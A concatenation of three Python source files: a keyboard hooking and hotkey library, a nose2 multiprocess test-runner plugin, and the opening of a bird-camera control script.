steps = parse_hotkey(hotkey)
if len(steps) > 1:
raise ValueError("Impossible to check if multi-step hotkeys are pressed (`a+b` is ok, `a, b` isn't).")
# Convert _pressed_events into a set
with _pressed_events_lock:
pressed_scan_codes = set(_pressed_events)
for scan_codes in steps[0]:
if not any(scan_code in pressed_scan_codes for scan_code in scan_codes):
return False
return True
def call_later(fn, args=(), delay=0.001):
"""
Calls the provided function in a new thread after waiting some time.
Useful for giving the system some time to process an event, without blocking
the current execution flow.
"""
thread = _Thread(target=lambda: (_time.sleep(delay), fn(*args)))
thread.start()
_hooks = {}
def hook(callback, suppress=False, on_remove=lambda: None):
"""
Installs a global listener on all available keyboards, invoking `callback`
each time a key is pressed or released.
The event passed to the callback is of type `keyboard.KeyboardEvent`,
with the following attributes:
- `name`: an Unicode representation of the character (e.g. "&") or
description (e.g. "space"). The name is always lower-case.
- `scan_code`: number representing the physical key, e.g. 55.
- `time`: timestamp of the time the event occurred, with as much precision
as given by the OS.
Returns the given callback for easier development.
"""
if suppress:
_listener.start_if_necessary()
append, remove = _listener.blocking_hooks.append, _listener.blocking_hooks.remove
else:
append, remove = _listener.add_handler, _listener.remove_handler
append(callback)
def remove_():
del _hooks[callback]
del _hooks[remove_]
remove(callback)
on_remove()
_hooks[callback] = _hooks[remove_] = remove_
return remove_
def on_press(callback, suppress=False):
"""
Invokes `callback` for every KEY_DOWN event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_UP or callback(e), suppress=suppress)
def on_release(callback, suppress=False):
"""
Invokes `callback` for every KEY_UP event. For details see `hook`.
"""
return hook(lambda e: e.event_type == KEY_DOWN or callback(e), suppress=suppress)
def hook_key(key, callback, suppress=False):
"""
Hooks key up and key down events for a single key. Returns the event handler
created. To remove a hooked key use `unhook_key(key)` or
`unhook_key(handler)`.
Note: this function shares state with hotkeys, so `clear_all_hotkeys`
affects it aswell.
"""
_listener.start_if_necessary()
store = _listener.blocking_keys if suppress else _listener.nonblocking_keys
scan_codes = key_to_scan_codes(key)
for scan_code in scan_codes:
store[scan_code].append(callback)
def remove_():
del _hooks[callback]
del _hooks[key]
del _hooks[remove_]
for scan_code in scan_codes:
store[scan_code].remove(callback)
_hooks[callback] = _hooks[key] = _hooks[remove_] = remove_
return remove_
def on_press_key(key, callback, suppress=False):
"""
Invokes `callback` for KEY_DOWN event related to the given key. For details see `hook`.
"""
return hook_key(key, lambda e: e.event_type == KEY_UP or callback(e), suppress=suppress)
def on_release_key(key, callback, suppress=False):
"""
Invokes `callback` for KEY_UP event related to the given key. For details see `hook`.
"""
return hook_key(key, lambda e: e.event_type == KEY_DOWN or callback(e), suppress=suppress)
def unhook(remove):
"""
Removes a previously added hook, either by callback or by the return value
of `hook`.
"""
_hooks[remove]()
unhook_key = unhook
def unhook_all():
"""
Removes all keyboard hooks in use, including hotkeys, abbreviations, word
listeners, `record`ers and `wait`s.
"""
_listener.start_if_necessary()
_listener.blocking_keys.clear()
_listener.nonblocking_keys.clear()
del _listener.blocking_hooks[:]
del _listener.handlers[:]
unhook_all_hotkeys()
def block_key(key):
"""
Suppresses all key events of the given key, regardless of modifiers.
"""
return hook_key(key, lambda e: False, suppress=True)
unblock_key = unhook_key
def remap_key(src, dst):
"""
Whenever the key `src` is pressed or released, regardless of modifiers,
press or release the hotkey `dst` instead.
"""
def handler(event):
if event.event_type == KEY_DOWN:
press(dst)
else:
release(dst)
return False
return hook_key(src, handler, suppress=True)
unremap_key = unhook_key
def parse_hotkey_combinations(hotkey):
"""
Parses a user-provided hotkey. Differently from `parse_hotkey`,
instead of each step being a list of the different scan codes for each key,
each step is a list of all possible combinations of those scan codes.
"""
def combine_step(step):
# A single step may be composed of many keys, and each key can have
# multiple scan codes. To speed up hotkey matching and avoid introducing
# event delays, we list all possible combinations of scan codes for these
# keys. Hotkeys are usually small, and there are not many combinations, so
# this is not as insane as it sounds.
return (tuple(sorted(scan_codes)) for scan_codes in _itertools.product(*step))
return tuple(tuple(combine_step(step)) for step in parse_hotkey(hotkey))
def _add_hotkey_step(handler, combinations, suppress):
"""
Hooks a single-step hotkey (e.g. 'shift+a').
"""
container = _listener.blocking_hotkeys if suppress else _listener.nonblocking_hotkeys
# Register the scan codes of every possible combination of
# modfiier + main key. Modifiers have to be registered in
# filtered_modifiers too, so suppression and replaying can work.
for scan_codes in combinations:
for scan_code in scan_codes:
if is_modifier(scan_code):
_listener.filtered_modifiers[scan_code] += 1
container[scan_codes].append(handler)
def remove():
for scan_codes in combinations:
for scan_code in scan_codes:
if is_modifier(scan_code):
_listener.filtered_modifiers[scan_code] -= 1
container[scan_codes].remove(handler)
return remove
_hotkeys = {}
def add_hotkey(hotkey, callback, args=(), suppress=False, timeout=1, trigger_on_release=False):
"""
Invokes a callback every time a hotkey is pressed. The hotkey must
be in the format `ctrl+shift+a, s`. This would trigger when the user holds
ctrl, shift and "a" at once, releases, and then presses "s". To represent
literal commas, pluses, and spaces, use their names ('comma', 'plus',
'space').
- `args` is an optional list of arguments to passed to the callback during
each invocation.
- `suppress` defines if successful triggers should block the keys from being
sent to other programs.
- `timeout` is the amount of seconds allowed to pass between key presses.
- `trigger_on_release` if true, the callback is invoked on key release instead
of key press.
The event handler function is returned. To remove a hotkey call
`remove_hotkey(hotkey)` or `remove_hotkey(handler)`.
before the hotkey state is reset.
Note: hotkeys are activated when the last key is *pressed*, not released.
Note: the callback is executed in a separate thread, asynchronously. For an
example of how to use a callback synchronously, see `wait`.
Examples:
# Different but equivalent ways to listen for a spacebar key press.
add_hotkey(' ', print, args=['space was pressed'])
add_hotkey('space', print, args=['space was pressed'])
add_hotkey('Space', print, args=['space was pressed'])
# Here 57 represents the keyboard code for spacebar; so you will be
# pressing 'spacebar', not '57' to activate the print function.
add_hotkey(57, print, args=['space was pressed'])
add_hotkey('ctrl+q', quit)
add_hotkey('ctrl+alt+enter, space', some_callback)
"""
if args:
callback = lambda callback=callback: callback(*args)
_listener.start_if_necessary()
steps = parse_hotkey_combinations(hotkey)
event_type = KEY_UP if trigger_on_release else KEY_DOWN
if len(steps) == 1:
# Deciding when to allow a KEY_UP event is far harder than I thought,
# and any mistake will make that key "sticky". Therefore just let all
# KEY_UP events go through as long as that's not what we are listening
# for.
handler = lambda e: (event_type == KEY_DOWN and e.event_type == KEY_UP and e.scan_code in _logically_pressed_keys) or (event_type == e.event_type and callback())
remove_step = _add_hotkey_step(handler, steps[0], suppress)
def remove_():
remove_step()
del _hotkeys[hotkey]
del _hotkeys[remove_]
del _hotkeys[callback]
# TODO: allow multiple callbacks for each hotkey without overwriting the
# remover.
_hotkeys[hotkey] = _hotkeys[remove_] = _hotkeys[callback] = remove_
return remove_
state = _State()
state.remove_catch_misses = None
state.remove_last_step = None
state.suppressed_events = []
state.last_update = float('-inf')
def catch_misses(event, force_fail=False):
if (
event.event_type == event_type
and state.index
and event.scan_code not in allowed_keys_by_step[state.index]
) or (
timeout
and _time.monotonic() - state.last_update >= timeout
) or force_fail: # Weird formatting to ensure short-circuit.
state.remove_last_step()
for event in state.suppressed_events:
if event.event_type == KEY_DOWN:
press(event.scan_code)
else:
release(event.scan_code)
del state.suppressed_events[:]
index = 0
set_index(0)
return True
def set_index(new_index):
state.index = new_index
if new_index == 0:
# This is done for performance reasons, avoiding a global key hook
# that is always on.
state.remove_catch_misses = lambda: None
elif new_index == 1:
state.remove_catch_misses()
# Must be `suppress=True` to ensure `send` has priority.
state.remove_catch_misses = hook(catch_misses, suppress=True)
if new_index == len(steps) - 1:
def handler(event):
if event.event_type == KEY_UP:
remove()
set_index(0)
accept = event.event_type == event_type and callback()
if accept:
return catch_misses(event, force_fail=True)
else:
state.suppressed_events[:] = [event]
return False
remove = _add_hotkey_step(handler, steps[state.index], suppress)
else:
# Fix value of next_index.
def handler(event, new_index=state.index+1):
if event.event_type == KEY_UP:
remove()
set_index(new_index)
state.suppressed_events.append(event)
return False
remove = _add_hotkey_step(handler, steps[state.index], suppress)
state.remove_last_step = remove
state.last_update = _time.monotonic()
return False
set_index(0)
allowed_keys_by_step = [
set().union(*step)
for step in steps
]
def remove_():
state.remove_catch_misses()
state.remove_last_step()
del _hotkeys[hotkey]
del _hotkeys[remove_]
del _hotkeys[callback]
# TODO: allow multiple callbacks for each hotkey without overwriting the
# remover.
_hotkeys[hotkey] = _hotkeys[remove_] = _hotkeys[callback] = remove_
return remove_
register_hotkey = add_hotkey
def remove_hotkey(hotkey_or_callback):
"""
Removes a previously hooked hotkey. Must be called wtih the value returned
by `add_hotkey`.
"""
_hotkeys[hotkey_or_callback]()
unregister_hotkey = clear_hotkey = remove_hotkey
def unhook_all_hotkeys():
"""
Removes all keyboard hotkeys in use, including abbreviations, word listeners,
`record`ers and `wait`s.
"""
# Because of "alises" some hooks may have more than one entry, all of which
# are removed together.
_listener.blocking_hotkeys.clear()
_listener.nonblocking_hotkeys.clear()
unregister_all_hotkeys = remove_all_hotkeys = clear_all_hotkeys = unhook_all_hotkeys
def remap_hotkey(src, dst, suppress=True, trigger_on_release=False):
"""
Whenever the hotkey `src` is pressed, suppress it and send
`dst` instead.
Example:
remap('alt+w', 'ctrl+up')
"""
def handler():
active_modifiers = sorted(modifier for modifier, state in _listener.modifier_states.items() if state == 'allowed')
for modifier in active_modifiers:
release(modifier)
send(dst)
for modifier in reversed(active_modifiers):
press(modifier)
return False
return add_hotkey(src, handler, suppress=suppress, trigger_on_release=trigger_on_release)
unremap_hotkey = remove_hotkey
def stash_state():
"""
Builds a list of all currently pressed scan codes, releases them and returns
the list. Pairs well with `restore_state` and `restore_modifiers`.
"""
# TODO: stash caps lock / numlock /scrollock state.
with _pressed_events_lock:
state = sorted(_pressed_events)
for scan_code in state:
_os_keyboard.release(scan_code)
return state
def restore_state(scan_codes):
"""
Given a list of scan_codes ensures these keys, and only these keys, are
pressed. Pairs well with `stash_state`, alternative to `restore_modifiers`.
"""
_listener.is_replaying = True
with _pressed_events_lock:
current = set(_pressed_events)
target = set(scan_codes)
for scan_code in current - target:
_os_keyboard.release(scan_code)
for scan_code in target - current:
_os_keyboard.press(scan_code)
_listener.is_replaying = False
def restore_modifiers(scan_codes):
"""
Like `restore_state`, but only restores modifier keys.
"""
restore_state((scan_code for scan_code in scan_codes if is_modifier(scan_code)))
def write(text, delay=0, restore_state_after=True, exact=None):
"""
Sends artificial keyboard events to the OS, simulating the typing of a given
text. Characters not available on the keyboard are typed as explicit unicode
characters using OS-specific functionality, such as alt+codepoint.
To ensure text integrity, all currently pressed keys are released before
the text is typed, and modifiers are restored afterwards.
- `delay` is the number of seconds to wait between keypresses, defaults to
no delay.
- `restore_state_after` can be used to restore the state of pressed keys
after the text is typed, i.e. presses the keys that were released at the
beginning. Defaults to True.
- `exact` forces typing all characters as explicit unicode (e.g.
alt+codepoint or special events). If None, uses platform-specific suggested
value.
"""
if exact is None:
exact = _platform.system() == 'Windows'
state = stash_state()
# Window's typing of unicode characters is quite efficient and should be preferred.
if exact:
for letter in text:
if letter in '\n\b':
send(letter)
else:
_os_keyboard.type_unicode(letter)
if delay: _time.sleep(delay)
else:
for letter in text:
try:
entries = _os_keyboard.map_name(_normalize_name(letter))
scan_code, modifiers = next(iter(entries))
except (KeyError, ValueError):
_os_keyboard.type_unicode(letter)
continue
for modifier in modifiers:
press(modifier)
_os_keyboard.press(scan_code)
_os_keyboard.release(scan_code)
for modifier in modifiers:
release(modifier)
if delay:
_time.sleep(delay)
if restore_state_after:
restore_modifiers(state)
def wait(hotkey=None, suppress=False, trigger_on_release=False):
"""
Blocks the program execution until the given hotkey is pressed or,
if given no parameters, blocks forever.
"""
if hotkey:
lock = _Event()
remove = add_hotkey(hotkey, lambda: lock.set(), suppress=suppress, trigger_on_release=trigger_on_release)
lock.wait()
remove_hotkey(remove)
else:
while True:
_time.sleep(1e6)
def get_hotkey_name(names=None):
"""
Returns a string representation of hotkey from the given key names, or
the currently pressed keys if not given. This function:
- normalizes names;
- removes "left" and "right" prefixes;
- replaces the "+" key name with "plus" to avoid ambiguity;
- puts modifier keys first, in a standardized order;
- sort remaining keys;
- finally, joins everything with "+".
Example:
get_hotkey_name(['+', 'left ctrl', 'shift'])
# "ctrl+shift+plus"
"""
if names is None:
_listener.start_if_necessary()
with _pressed_events_lock:
names = [e.name for e in _pressed_events.values()]
else:
names = [_normalize_name(name) for name in names]
clean_names = set(e.replace('left ', '').replace('right ', '').replace('+', 'plus') for e in names)
# https://developer.apple.com/macos/human-interface-guidelines/input-and-output/keyboard/
# > List modifier keys in the correct order. If you use more than one modifier key in a
# > hotkey, always list them in this order: Control, Option, Shift, Command.
modifiers = ['ctrl', 'alt', 'shift', 'windows']
sorting_key = lambda k: (modifiers.index(k) if k in modifiers else 5, str(k))
return '+'.join(sorted(clean_names, key=sorting_key))
def read_event(suppress=False):
"""
Blocks until a keyboard event happens, then returns that event.
"""
queue = _queue.Queue(maxsize=1)
hooked = hook(queue.put, suppress=suppress)
while True:
event = queue.get()
unhook(hooked)
return event
def read_key(suppress=False):
"""
Blocks until a keyboard event happens, then returns that event's name or,
if missing, its scan code.
"""
event = read_event(suppress)
return event.name or event.scan_code
def read_hotkey(suppress=True):
"""
Similar to `read_key()`, but blocks until the user presses and releases a
hotkey (or single key), then returns a string representing the hotkey
pressed.
Example:
read_hotkey()
# "ctrl+shift+p"
"""
queue = _queue.Queue()
fn = lambda e: queue.put(e) or e.event_type == KEY_DOWN
hooked = hook(fn, suppress=suppress)
while True:
event = queue.get()
if event.event_type == KEY_UP:
unhook(hooked)
with _pressed_events_lock:
names = [e.name for e in _pressed_events.values()] + [event.name]
return get_hotkey_name(names)
def get_typed_strings(events, allow_backspace=True):
"""
Given a sequence of events, tries to deduce what strings were typed.
Strings are separated when a non-textual key is pressed (such as tab or
enter). Characters are converted to uppercase according to shift and
capslock status. If `allow_backspace` is True, backspaces remove the last
character typed.
This function is a generator, so you can pass an infinite stream of events
and convert them to strings in real time.
Note this functions is merely an heuristic. Windows for example keeps per-
process keyboard state such as keyboard layout, and this information is not
available for our hooks.
get_type_strings(record()) #-> ['This is what', 'I recorded', '']
"""
backspace_name = 'delete' if _platform.system() == 'Darwin' else 'backspace'
shift_pressed = False
capslock_pressed = False
string = ''
for event in events:
name = event.name
# Space is the only key that we _parse_hotkey to the spelled out name
# because of legibility. Now we have to undo that.
if event.name == 'space':
name = ' '
if 'shift' in event.name:
shift_pressed = event.event_type == 'down'
elif event.name == 'caps lock' and event.event_type == 'down':
capslock_pressed = not capslock_pressed
elif allow_backspace and event.name == backspace_name and event.event_type == 'down':
string = string[:-1]
elif event.event_type == 'down':
if len(name) == 1:
if shift_pressed ^ capslock_pressed:
name = name.upper()
string = string + name
else:
yield string
string = ''
yield string
_recording = None
def start_recording(recorded_events_queue=None):
"""
Starts recording all keyboard events into a global variable, or the given
queue if any. Returns the queue of events and the hooked function.
Use `stop_recording()` or `unhook(hooked_function)` to stop.
"""
recorded_events_queue = recorded_events_queue or _queue.Queue()
global _recording
_recording = (recorded_events_queue, hook(recorded_events_queue.put))
return _recording
def stop_recording():
"""
Stops the global recording of events and returns a list of the events
captured.
"""
global _recording
if not _recording:
raise ValueError('Must call "start_recording" before.')
recorded_events_queue, hooked = _recording
unhook(hooked)
return list(recorded_events_queue.queue)
def record(until='escape', suppress=False, trigger_on_release=False):
"""
Records all keyboard events from all keyboards until the user presses the
given hotkey. Then returns the list of events recorded, of type
`keyboard.KeyboardEvent`. Pairs well with
`play(events)`.
Note: this is a blocking function.
Note: for more details on the keyboard hook and events see `hook`.
"""
start_recording()
wait(until, suppress=suppress, trigger_on_release=trigger_on_release)
return stop_recording()
def play(events, speed_factor=1.0):
"""
Plays a sequence of recorded events, maintaining the relative time
intervals. If speed_factor is <= 0 then the actions are replayed as fast
as the OS allows. Pairs well with `record()`.
Note: the current keyboard state is cleared at the beginning and restored at
the end of the function.
"""
state = stash_state()
last_time = None
for event in events:
if speed_factor > 0 and last_time is not None:
_time.sleep((event.time - last_time) / speed_factor)
last_time = event.time
key = event.scan_code or event.name
press(key) if event.event_type == KEY_DOWN else release(key)
restore_modifiers(state)
replay = play
_word_listeners = {}
def add_word_listener(word, callback, triggers=['space'], match_suffix=False, timeout=2):
"""
Invokes a callback every time a sequence of characters is typed (e.g. 'pet')
and followed by a trigger key (e.g. space). Modifiers (e.g. alt, ctrl,
shift) are ignored.
- `word` the typed text to be matched. E.g. 'pet'.
- `callback` is an argument-less function to be invoked each time the word
is typed.
- `triggers` is the list of keys that will cause a match to be checked. If
the user presses some key that is not a character (len>1) and not in
triggers, the characters so far will be discarded. By default the trigger
is only `space`.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
Returns the event handler created. To remove a word listener use
`remove_word_listener(word)` or `remove_word_listener(handler)`.
Note: all actions are performed on key down. Key up events are ignored.
Note: word mathes are **case sensitive**.
"""
state = _State()
state.current = ''
state.time = -1
def handler(event):
name = event.name
if event.event_type == KEY_UP or name in all_modifiers: return
if timeout and event.time - state.time > timeout:
state.current = ''
state.time = event.time
matched = state.current == word or (match_suffix and state.current.endswith(word))
if name in triggers and matched:
callback()
state.current = ''
elif len(name) > 1:
state.current = ''
else:
state.current += name
hooked = hook(handler)
def remove():
hooked()
del _word_listeners[word]
del _word_listeners[handler]
del _word_listeners[remove]
_word_listeners[word] = _word_listeners[handler] = _word_listeners[remove] = remove
# TODO: allow multiple word listeners and removing them correctly.
return remove
def remove_word_listener(word_or_handler):
"""
Removes a previously registered word listener. Accepts either the word used
during registration (exact string) or the event handler returned by the
`add_word_listener` or `add_abbreviation` functions.
"""
_word_listeners[word_or_handler]()
def add_abbreviation(source_text, replacement_text, match_suffix=False, timeout=2):
"""
Registers a hotkey that replaces one typed text with another. For example
add_abbreviation('tm', u'™')
Replaces every "tm" followed by a space with a ™ symbol (and no space). The
replacement is done by sending backspace events.
- `match_suffix` defines if endings of words should also be checked instead
of only whole words. E.g. if true, typing 'carpet'+space will trigger the
listener for 'pet'. Defaults to false, only whole words are checked.
- `timeout` is the maximum number of seconds between typed characters before
the current word is discarded. Defaults to 2 seconds.
For more details see `add_word_listener`.
"""
replacement = '\b'*(len(source_text)+1) + replacement_text
callback = lambda: write(replacement)
return add_word_listener(source_text, callback, match_suffix=match_suffix, timeout=timeout)
# Aliases.
register_word_listener = add_word_listener
register_abbreviation = add_abbreviation
remove_abbreviation = remove_word_listener
|
mp.py
|
import logging
import multiprocessing
import select
import unittest
import collections
import os
import sys
import six
import multiprocessing.connection as connection
from nose2 import events, loader, result, runner, session, util
log = logging.getLogger(__name__)
class MultiProcess(events.Plugin):
configSection = 'multiprocess'
def __init__(self):
self.addArgument(self.setProcs, 'N', 'processes', '# o procs')
self.testRunTimeout = self.config.as_float('test-run-timeout', 60.0)
self.procs = self.config.as_int(
'processes', multiprocessing.cpu_count())
self.setAddress(self.config.as_str('bind_address', None))
self.cases = {}
def setProcs(self, num):
self.procs = int(num[0]) # FIXME merge n fix
self.register()
def setAddress(self, address):
if address is None or address.strip() == '':
address = []
else:
address = [x.strip() for x in address.split(':')[:2]]
#Background: On Windows, select.select only works on sockets. So the
#ability to select a bindable address and optionally port for the mp
#plugin was added. Pipes should support a form of select, but this
#would require using pywin32. There are altnernatives but all have
#some kind of downside. An alternative might be creating a connection
#like object using a shared queue for incomings events.
self.bind_host = None
self.bind_port = 0
if sys.platform == "win32" or address:
self.bind_host = '127.116.157.163'
if address and address[0]:
self.bind_host = address[0]
self.bind_port = 0
if len(address) >= 2:
self.bind_port = int(address[1])
def pluginsLoaded(self, event):
self.addMethods('registerInSubprocess', 'startSubprocess',
'stopSubprocess')
def startTestRun(self, event):
event.executeTests = self._runmp
def beforeInteraction(self, event):
# prevent interactive plugins from running
event.handled = True
return False
def _runmp(self, test, result):
flat = list(self._flatten(test))
procs = self._startProcs(len(flat))
# send one initial task to each process
for proc, conn in procs:
if not flat:
break
caseid = flat.pop(0)
conn.send(caseid)
rdrs = [conn for proc, conn in procs if proc.is_alive()]
while flat or rdrs:
ready, _, _ = select.select(rdrs, [], [], self.testRunTimeout)
for conn in ready:
# XXX proc could be dead
try:
remote_events = conn.recv()
except EOFError:
# probably dead/12
log.warning("Subprocess connection closed unexpectedly")
continue # XXX or die?
if remote_events is None:
# XXX proc is done, how to mark it dead?
log.debug("Conn closed %s", conn)
rdrs.remove(conn)
continue
# replay events
testid, events = remote_events
log.debug("Received results for %s", testid)
for (hook, event) in events:
log.debug("Received %s(%s)", hook, event)
self._localize(event)
getattr(self.session.hooks, hook)(event)
# send a new test to the worker if there is one left
if not flat:
# if there isn't send None - it's the 'done' flag
conn.send(None)
continue
caseid = flat.pop(0)
conn.send(caseid)
for _, conn in procs:
conn.close()
# ensure we wait until all processes are done before
# exiting, to allow plugins running there to finalize
for proc, _ in procs:
proc.join()
def _prepConns(self):
"""
If the ``bind_host`` is not ``None``, return:
(multiprocessing.connection.Listener, (address, port, authkey))
else:
(parent_connection, child_connection)
For the former case: ``accept`` must be called on the listener. In order
to get a ``Connection`` object for the socket.
"""
if self.bind_host is not None:
#prevent "accidental" wire crossing
authkey = os.urandom(20)
address = (self.bind_host, self.bind_port)
listener = connection.Listener(address, authkey=authkey)
return (listener, listener.address + (authkey,))
else:
return multiprocessing.Pipe()
def _acceptConns(self, parent_conn):
"""
When listener is is a :class:`connection.Listener` instance: accept the next
incoming connection. However, a timeout mechanism is needed. Since
this functionality was added to support mp over inet sockets, this method
assumes a Socket-based listen, and will accept the private _socket
member to get a low_level socket to do a select on.
"""
if isinstance(parent_conn, connection.Listener):
#ick private interface
rdrs = [parent_conn._listener._socket]
readable, _, _ = select.select(rdrs, [], [],
self.testRunTimeout)
if readable:
return parent_conn.accept()
else:
raise RuntimeError('MP: Socket Connection Failed')
else:
return parent_conn
def _startProcs(self, test_count):
# XXX create session export
session_export = self._exportSession()
procs = []
count = min(test_count, self.procs)
log.debug("Creating %i worker processes", count)
for i in range(0, count):
parent_conn, child_conn = self._prepConns()
proc = multiprocessing.Process(
target=procserver, args=(session_export, child_conn))
proc.daemon = True
proc.start()
parent_conn = self._acceptConns(parent_conn)
procs.append((proc, parent_conn))
return procs
def _flatten(self, suite):
# XXX
# examine suite tests to find out if they have class
# or module fixtures and group them that way into names
# of test classes or modules
# ALSO record all test cases in self.cases
log.debug("Flattening test into list of IDs")
mods = {}
classes = {}
stack = [suite]
while stack:
suite = stack.pop()
for test in suite:
if isinstance(test, unittest.TestSuite):
stack.append(test)
else:
testid = util.test_name(test)
self.cases[testid] = test
if util.has_module_fixtures(test):
mods.setdefault(test.__class__.__module__, []).append(
testid)
elif util.has_class_fixtures(test):
classes.setdefault(
"%s.%s" % (test.__class__.__module__,
test.__class__.__name__),
[]).append(testid)
else:
yield testid
for cls in sorted(classes.keys()):
yield cls
for mod in sorted(mods.keys()):
yield mod
def _localize(self, event):
# XXX set loader, case, result etc to local ones, if present in event
# (event case will be just the id)
# (traceback in exc_info if any won't be real!)
if hasattr(event, 'result'):
event.result = self.session.testResult
if hasattr(event, 'loader'):
event.loader = self.session.testLoader
if hasattr(event, 'runner'):
event.runner = self.session.testRunner
if hasattr(event, 'test') and isinstance(event.test, six.string_types):
# remote event.case is the test id
try:
event.test = self.cases[event.test]
except KeyError:
event.test = self.session.testLoader.failedLoadTests(
'test_not_found',
RuntimeError("Unable to locate test case for %s in "
"main process" % event.test))._tests[0]
def _exportSession(self):
# argparse isn't pickleable
# no plugin instances
# no hooks
export = {'config': self.session.config,
'verbosity': self.session.verbosity,
'startDir': self.session.startDir,
'topLevelDir': self.session.topLevelDir,
'logLevel': self.session.logLevel,
# XXX classes or modules?
'pluginClasses': []}
# XXX fire registerInSubprocess -- add those plugin classes
# (classes must be pickleable!)
event = RegisterInSubprocessEvent() # FIXME should be own event type
self.session.hooks.registerInSubprocess(event)
export['pluginClasses'].extend(event.pluginClasses)
return export
def procserver(session_export, conn):
# init logging system
rlog = multiprocessing.log_to_stderr()
rlog.setLevel(session_export['logLevel'])
# make a real session from the "session" we got
ssn = session.Session()
ssn.config = session_export['config']
ssn.hooks = RecordingPluginInterface()
ssn.verbosity = session_export['verbosity']
ssn.startDir = session_export['startDir']
ssn.topLevelDir = session_export['topLevelDir']
ssn.prepareSysPath()
loader_ = loader.PluggableTestLoader(ssn)
ssn.testLoader = loader_
result_ = result.PluggableTestResult(ssn)
ssn.testResult = result_
runner_ = runner.PluggableTestRunner(ssn) # needed??
ssn.testRunner = runner_
# load and register plugins
ssn.plugins = [
plugin(session=ssn) for plugin in session_export['pluginClasses']]
rlog.debug("Plugins loaded: %s", ssn.plugins)
for plugin in ssn.plugins:
plugin.register()
rlog.debug("Registered %s in subprocess", plugin)
if isinstance(conn, collections.Sequence):
conn = connection.Client(conn[:2], authkey=conn[2])
event = SubprocessEvent(loader_, result_, runner_, ssn.plugins, conn)
res = ssn.hooks.startSubprocess(event)
if event.handled and not res:
conn.send(None)
conn.close()
ssn.hooks.stopSubprocess(event)
return
# receive and run tests
executor = event.executeTests
for testid in gentests(conn):
if testid is None:
break
# XXX to handle weird cases like layers, need to
# deal with the case that testid is something other
# than a simple string.
test = event.loader.loadTestsFromName(testid)
# xxx try/except?
rlog.debug("Execute test %s (%s)", testid, test)
executor(test, event.result)
events = [e for e in ssn.hooks.flush()]
conn.send((testid, events))
rlog.debug("Log for %s returned", testid)
conn.send(None)
conn.close()
ssn.hooks.stopSubprocess(event)
# test generator
def gentests(conn):
while True:
try:
testid = conn.recv()
if testid is None:
return
yield testid
except EOFError:
return
# custom event classes
class SubprocessEvent(events.Event):
"""Event fired at start and end of subprocess execution.
.. attribute :: loader
Test loader instance
.. attribute :: result
Test result
.. attribute :: plugins
List of plugins loaded in the subprocess.
.. attribute :: connection
The :class:`multiprocessing.Connection` instance that the
subprocess uses for communication with the main process.
.. attribute :: executeTests
Callable that will be used to execute tests. Plugins may set
this attribute to wrap or otherwise change test execution. The
callable must match the signature::
def execute(suite, result):
...
"""
def __init__(self, loader, result, runner, plugins, connection, **metadata):
self.loader = loader
self.result = result
self.runner = runner
self.plugins = plugins
self.connection = connection
self.executeTests = lambda test, result: test(result)
super(SubprocessEvent, self).__init__(**metadata)
class RegisterInSubprocessEvent(events.Event):
"""Event fired to notify plugins that multiprocess testing will occur
.. attribute :: pluginClasses
Add a plugin class to this list to cause the plugin to be
instantiated in each test-running subprocess. The most common
thing to do, for plugins that need to run in subprocesses, is::
def registerInSubprocess(self, event):
event.pluginClasses.append(self.__class__)
"""
def __init__(self, **metadata):
self.pluginClasses = []
super(RegisterInSubprocessEvent, self).__init__(**metadata)
# custom hook system that records calls and events
class RecordingHook(events.Hook):
def __init__(self, method, interface):
super(RecordingHook, self).__init__(method)
self.interface = interface
def __call__(self, event):
res = super(RecordingHook, self).__call__(event)
self.interface.log(self.method, event)
return res
class RecordingPluginInterface(events.PluginInterface):
hookClass = RecordingHook
noLogMethods = set(
['getTestCaseNames', 'startSubprocess', 'stopSubprocess',
'registerInSubprocess', 'moduleLoadedSuite'])
def __init__(self):
super(RecordingPluginInterface, self).__init__()
self.events = []
def log(self, method, event):
self.events.append((method, event))
def flush(self):
events = self.events[:]
self.events = []
return events
def register(self, method, plugin):
"""Register a plugin for a method.
:param method: A method name
:param plugin: A plugin instance
"""
self._hookForMethod(method).append(plugin)
def __getattr__(self, attr):
if attr.startswith('__'):
raise AttributeError('No %s in %s' % (attr, self))
return self._hookForMethod(attr)
def _hookForMethod(self, method):
# return recording hook for most hooks, normal hook for those
# (like test loading and subprocess events) that we don't want
# to send back to the main process.
try:
return self.hooks[method]
except KeyError:
if method in self.noLogMethods or method.startswith('loadTest'):
hook = events.Hook(method)
else:
hook = self.hookClass(method, self)
self.hooks[method] = hook
return hook
|
camera_control.py
|
#!/usr/bin/env python3
import requests
import io
import os
from datetime import datetime
import random
import time
from urllib.parse import quote
import multiprocessing, threading
from detection import yolo_all
import rtsp
import cv2
import pygame
import numpy as np
IP_ADDRESS = "192.168.1.115"
AUTH = (os.getenv("BIRDCAM_USER"), os.getenv("BIRDCAM_PASS"))
if None in AUTH:
print("Did not detect environment variables BIRDCAM_USER and BIRDCAM_PASS")
commands = ('left', 'right', 'up', 'down', 'home', 'stop', 'zoomin', 'zoomout', 'focusin', 'focusout', 'hscan', 'vscan')
presets = ((0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1))
infrared = "open", "close", "auto"
black = (0,0,0)
white = (255,255,255)
HORIZONTAL_AXIS = 2
HORIZONTAL_DEADZONE = 0.1
VERTICAL_AXIS = 1
VERTICAL_DEADZONE = 0.3
SPEED_AXIS = 3
PRESET_HAT = 0
ZOOM_IN = 3
ZOOM_OUT = 4
FOCUS_IN = 1
FOCUS_OUT = 2
SNAPSHOT = 0
SPEED_RANGE = (1, 63)
SPEED_THRESHOLD = 0.001
IR_TOGGLE = 6
client = rtsp.Client(rtsp_server_uri = f'rtsp://{IP_ADDRESS}:554/1')
def main():
# Initialize image processing
image_queue = multiprocessing.Queue()
boxes = multiprocessing.Queue()
image_process = multiprocessing.Process(target = yolo_all.image_process, args=[image_queue, boxes])
image_process.start()
bird_boxes = []
# motion tracking
back_sub = cv2.createBackgroundSubtractorMOG2(history=700,
varThreshold=25, detectShadows=True)
kernel = np.ones((30,30),np.uint8)
# Initialize pygame
pygame.init()
pygame.font.init()
myfont = pygame.font.SysFont('Consolas', 30)
display_size = 800,448
image_size = 800, 448
hq_size = 2560,1440
display = pygame.display.set_mode(display_size)#, pygame.NOFRAME)
pygame.display.set_caption('Bird Cam Controls')
